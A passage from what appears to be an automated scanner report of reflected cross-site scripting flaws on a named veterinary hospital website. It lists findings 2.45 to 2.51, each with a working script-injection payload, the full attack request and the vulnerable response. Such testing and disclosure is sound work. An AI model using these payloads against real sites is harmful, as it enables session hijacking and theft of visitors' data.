GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-841661e9e"><script>alert(1)</script>8361d0a233a&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.co
m%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:23 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=hg9evj4m1q5qnnnvp8ppo8c1g0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-841661e9e"><script>alert(1)</script>8361d0a233a&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.2
...[SNIP]...

2.45. http://www.vcahospitals.com/main/offer [uri parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the uri request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 922c0"><script>alert(1)</script>c8ab77b4859 was submitted in the uri parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2
525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d922c0"><script>alert(1)</script>c8ab77b4859&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:28 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=vrccil3nvdrv3u04cdk943phe3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
52bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d922c0"><script>alert(1)</script>c8ab77b4859&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.46. http://www.vcahospitals.com/main/offer [useragent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the useragent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ccc8"><script>alert(1)</script>dd190c671a2 was submitted in the useragent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2
525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)9ccc8"><script>alert(1)</script>dd190c671a2&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:34 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=icsbsqp3afi5ar05hms93sc531; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)9ccc8"><script>alert(1)</script>dd190c671a2&variant=&zip=" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.47. http://www.vcahospitals.com/main/offer [utm_campaign parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f65b"><script>alert(1)</script>14ab4538db8 was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded1f65b"><script>alert(1)</script>14ab4538db8&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:04:36 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=0mlrillum4vu8mp1o97hfbr3r3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded1f65b"><script>alert(1)</script>14ab4538db8&gclid=CNrfoemwt6cCFcbd4Aod8keVAw" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.48. http://www.vcahospitals.com/main/offer [utm_medium parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79b9c"><script>alert(1)</script>72b305046a9 was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?r=E13&utm_source=google&utm_medium=ppc79b9c"><script>alert(1)</script>72b305046a9&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:04:17 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=baenvd1f3pb9gev61jv8jo9f25; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?r=E13&utm_source=google&utm_medium=ppc79b9c"><script>alert(1)</script>72b305046a9&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.49. http://www.vcahospitals.com/main/offer [utm_source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcfe2"><script>alert(1)</script>09d0de21174 was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?r=E13&utm_source=googlebcfe2"><script>alert(1)</script>09d0de21174&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:04:07 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=t86j051ojsn7hfvp5cju39eml7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10791

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?r=E13&utm_source=googlebcfe2"><script>alert(1)</script>09d0de21174&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.50. http://www.vcahospitals.com/main/offer [utm_term parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the utm_term request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cec13"><script>alert(1)</script>22dd34fcafe was submitted in the utm_term parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antechcec13"><script>alert(1)</script>22dd34fcafe&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:04:26 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=ul77dhjfgbf0ges117v5r933n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antechcec13"><script>alert(1)</script>22dd34fcafe&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.51. http://www.vcahospitals.com/main/offer [variant parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the variant request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83dad"><script>alert(1)</script>b2542e55643 was submitted in the variant parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253d